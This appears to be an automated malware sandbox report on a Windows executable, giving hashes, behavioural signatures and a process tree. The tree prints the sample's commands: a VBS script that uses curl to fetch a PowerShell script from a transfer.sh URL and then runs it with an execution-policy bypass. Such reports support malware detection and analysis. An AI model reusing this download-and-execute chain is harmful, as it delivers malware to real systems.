Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
17/01/2023, 08:26
Static task
static1
Behavioral task
behavioral1
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win10v2004-20221111-en
General
-
Target
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
-
Size
547KB
-
MD5
b0ab211e83a23d58e1322e4d2d6f0a96
-
SHA1
d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
-
SHA256
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
-
SHA512
4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
-
SSDEEP
3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1640 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2024 wrote to memory of 2032 2024 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 28 PID 2024 wrote to memory of 2032 2024 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 28 PID 2024 wrote to memory of 2032 2024 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 28 PID 2032 wrote to memory of 808 2032 cmd.exe 30 PID 2032 wrote to memory of 808 2032 cmd.exe 30 PID 2032 wrote to memory of 808 2032 cmd.exe 30 PID 808 wrote to memory of 964 808 WScript.exe 31 PID 808 wrote to memory of 964 808 WScript.exe 31 PID 808 wrote to memory of 964 808 WScript.exe 31 PID 964 wrote to memory of 1804 964 cmd.exe 33 PID 964 wrote to memory of 1804 964 cmd.exe 33 PID 964 wrote to memory of 1804 964 cmd.exe 33 PID 808 wrote to memory of 1860 808 WScript.exe 35 PID 808 wrote to memory of 1860 808 WScript.exe 35 PID 808 wrote to memory of 1860 808 WScript.exe 35 PID 1860 wrote to memory of 1572 1860 cmd.exe 36 PID 1860 wrote to memory of 1572 1860 cmd.exe 36 PID 1860 wrote to memory of 1572 1860 cmd.exe 36 PID 1572 wrote to memory of 1640 1572 cmd.exe 37 PID 1572 wrote to memory of 1640 1572 cmd.exe 37 PID 1572 wrote to memory of 1640 1572 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\cmd.execmd /c new.vbs2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps15⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps16⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
300.0MB
MD5f7e7099eea0cc25fc49d04cd53c573a1
SHA13abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074